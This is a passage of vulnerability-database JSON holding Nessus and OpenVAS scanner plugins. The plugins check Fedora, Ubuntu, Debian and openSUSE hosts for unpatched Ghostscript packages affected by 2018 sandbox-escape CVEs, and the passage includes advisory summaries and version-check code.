attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-12T00:00:00", "title": "Fedora 29 : ghostscript (2019-077a3f23c0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-19478", "CVE-2018-18073", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19134", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "modified": "2019-02-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:ghostscript"], "id": "FEDORA_2019-077A3F23C0.NASL", "href": "https://www.tenable.com/plugins/nessus/122103", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-077a3f23c0.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122103);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/21\");\n\n script_cve_id(\n \"CVE-2018-17961\",\n \"CVE-2018-18073\",\n \"CVE-2018-18284\",\n \"CVE-2018-19134\",\n \"CVE-2018-19409\",\n \"CVE-2018-19475\",\n \"CVE-2018-19476\",\n \"CVE-2018-19477\",\n \"CVE-2018-19478\"\n );\n script_xref(name:\"FEDORA\", value:\"2019-077a3f23c0\");\n script_xref(name:\"IAVB\", value:\"2019-B-0081-S\");\n\n script_name(english:\"Fedora 29 : ghostscript (2019-077a3f23c0)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - rebase to latest upstream version 9.26\n\n - Security fix for CVE-2018-19478 CVE-2018-19134\n CVE-2018-19477 CVE-2018-19476 CVE-2018-19475\n CVE-2018-19409 CVE-2018-18284 CVE-2018-18073\n CVE-2018-17961\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-077a3f23c0\");\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"ghostscript-9.26-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284"], "description": "The remote host is missing an update for\n the ", "modified": "2019-03-18T00:00:00", "published": "2018-11-01T00:00:00", "id": "OPENVAS:1361412562310843801", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843801", "type": "openvas", "title": "Ubuntu Update for ghostscript USN-3803-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3803_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for ghostscript USN-3803-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843801\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-01 06:05:18 +0100 (Thu, 01 Nov 2018)\");\n script_name(\"Ubuntu Update for ghostscript USN-3803-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|18\\.10|16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"3803-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3803-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for\n the 'ghostscript' package(s) announced via the USN-3803-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version\nis present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Tavis Ormandy discovered multiple security\nissues in Ghostscript. If a user or automated system were tricked into processing\na specially crafted file, a remote attacker could possibly use these issues to\naccess arbitrary files, execute arbitrary code, or cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"ghostscript on Ubuntu 18.10,\n Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"9.25~dfsg+1-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs9\", ver:\"9.25~dfsg+1-0ubuntu0.14.04.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"9.25~dfsg+1-0ubuntu0.18.04.2\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs9\", ver:\"9.25~dfsg+1-0ubuntu0.18.04.2\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"9.25~dfsg+1-0ubuntu1.1\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs9\", ver:\"9.25~dfsg+1-0ubuntu1.1\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ghostscript\", ver:\"9.25~dfsg+1-0ubuntu0.16.04.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libgs9\", ver:\"9.25~dfsg+1-0ubuntu0.16.04.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:07:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284"], "description": "This is a follow-up update for the recently discovered -dSAFER issues\nreported by Tavis Ormandy.\n\nTavis Ormandy discovered multiple vulnerabilities in Ghostscript, an\ninterpreter for the PostScript language, which could result in denial of\nservice, the creation of files or the execution of arbitrary code if a\nmalformed Postscript file is processed (despite the dSAFER sandbox being\nenabled).", "modified": "2020-01-29T00:00:00", "published": "2018-10-23T00:00:00", "id": "OPENVAS:1361412562310891552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891552", "type": "openvas", "title": "Debian LTS: Security Advisory for ghostscript (DLA-1552-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891552\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\");\n script_name(\"Debian LTS: Security Advisory for ghostscript (DLA-1552-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-23 00:00:00 +0200 (Tue, 23 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/10/msg00013.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"ghostscript on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n9.06~dfsg-2+deb8u11.\n\nWe recommend that you upgrade your ghostscript packages.\");\n\n script_tag(name:\"summary\", value:\"This is a follow-up update for the recently discovered -dSAFER issues\nreported by Tavis Ormandy.\n\nTavis Ormandy discovered multiple vulnerabilities in Ghostscript, an\ninterpreter for the PostScript language, which could result in denial of\nservice, the creation of files or the execution of arbitrary code if a\nmalformed Postscript file is processed (despite the dSAFER sandbox being\nenabled).\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ghostscript\", ver:\"9.06~dfsg-2+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ghostscript-dbg\", ver:\"9.06~dfsg-2+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"9.06~dfsg-2+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"9.06~dfsg-2+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"9.06~dfsg-2+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgs9\", ver:\"9.06~dfsg-2+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgs9-common\", ver:\"9.06~dfsg-2+deb8u11\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-18284", "CVE-2018-11645"], "description": "Several vulnerabilities were discovered in Ghostscript, the GPL\nPostScript/PDF interpreter, which may result in denial of service,\ndisclosure of existence and size of arbitrary files, or the execution of\narbitrary code if a malformed Postscript file is processed (despite the\ndSAFER sandbox being enabled).\n\nThis update rebases ghostscript for stretch to the upstream version 9.25\nwhich includes additional non-security related changes.", "modified": "2019-07-04T00:00:00", "published": "2018-11-10T00:00:00", "id": "OPENVAS:1361412562310704336", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704336", "type": "openvas", "title": "Debian Security Advisory DSA 4336-1 (ghostscript - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4336-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704336\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-11645\", \"CVE-2018-17961\", \"CVE-2018-18073\", \"CVE-2018-18284\");\n script_name(\"Debian Security Advisory DSA 4336-1 (ghostscript - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-11-10 00:00:00 +0100 (Sat, 10 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4336.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"ghostscript on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 9.25~dfsg-0+deb9u1.\n\nWe recommend that you upgrade your ghostscript packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/ghostscript\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in Ghostscript, the GPL\nPostScript/PDF interpreter, which may result in denial of service,\ndisclosure of existence and size of arbitrary files, or the execution of\narbitrary code if a malformed Postscript file is processed (despite the\ndSAFER sandbox being enabled).\n\nThis update rebases ghostscript for stretch to the upstream version 9.25\nwhich includes additional non-security related changes.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ghostscript\", ver:\"9.25~dfsg-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ghostscript-dbg\", ver:\"9.25~dfsg-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ghostscript-doc\", ver:\"9.25~dfsg-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ghostscript-x\", ver:\"9.25~dfsg-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgs-dev\", ver:\"9.25~dfsg-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgs9\", ver:\"9.25~dfsg-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgs9-common\", ver:\"9.25~dfsg-0+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:40:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310814566", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814566", "type": "openvas", "title": "openSUSE: Security Advisory for ghostscript (openSUSE-SU-2018:4140-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814566\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-17183\", \"CVE-2018-17961\", \"CVE-2018-18073\",\n \"CVE-2018-18284\", \"CVE-2018-19409\", \"CVE-2018-19475\",\n \"CVE-2018-19476\", \"CVE-2018-19477\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-12-18 07:41:34 +0100 (Tue, 18 Dec 2018)\");\n script_name(\"openSUSE: Security Advisory for ghostscript (openSUSE-SU-2018:4140-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:4140-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-12/msg00038.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ghostscript'\n package(s) announced via the openSUSE-SU-2018:4140-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ghostscript to version 9.26 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-19475: Fixed bypass of an intended access restriction in\n psi/zdevice2.c (bsc#1117327)\n\n - CVE-2018-19476: Fixed bypass of an intended access restriction in\n psi/zicc.c (bsc#1117313)\n\n - CVE-2018-19477: Fixed bypass of an intended access restriction in\n psi/zfjbig2.c (bsc#1117274)\n\n - CVE-2018-19409: Check if another device is used correctly in\n LockSafetyParams (bsc#1117022)\n\n - CVE-2018-18284: Fixed potential sandbox escape through 1Policy operator\n (bsc#1112229)\n\n - CVE-2018-18073: Fixed leaks through operator in saved execution stacks\n (bsc#1111480)\n\n - CVE-2018-17961: Fixed a -dSAFER sandbox escape by bypassing executeonly\n (bsc#1111479)\n\n - CVE-2018-17183: Fixed a potential code injection by specially crafted\n PostScript files (bsc#1109105)\n\n Version update to 9.26 (bsc#1117331):\n\n - Security issues have been the primary focus\n\n - Minor bug fixes and improvements\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1556=1\");\n\n script_tag(name:\"affected\", value:\"ghostscript on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-debuginfo\", rpm:\"ghostscript-debuginfo~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-debugsource\", rpm:\"ghostscript-debugsource~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-devel\", rpm:\"ghostscript-devel~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-mini\", rpm:\"ghostscript-mini~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-mini-debuginfo\", rpm:\"ghostscript-mini-debuginfo~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-mini-debugsource\", rpm:\"ghostscript-mini-debugsource~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-mini-devel\", rpm:\"ghostscript-mini-devel~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ghostscript-x11-debuginfo\", rpm:\"ghostscript-x11-debuginfo~9.26~14.12.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libspectre-debugsource\", rpm:\"libspectre-debugsource~0.2.7~17.4.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libspectre-devel\", rpm:\"libspectre-devel~0.2.7~17.4.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libspectre1\", rpm:\"libspectre1~0.2.7~17.4.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libspectre1-debuginfo\", rpm:\"libspectre1-debuginfo~0.2.7~17.4.2\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17961", "CVE-2018-18073", "CVE-2018-17183", "CVE-2018-19476", "CVE-2018-18284", "CVE-2018-19477", "CVE-2018-19475", "CVE-2018-19409"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310814565", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814565", "type": "openvas", "title": "openSUSE: Security Advisory for ghostscript (openSUSE-SU-2018:4138-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) 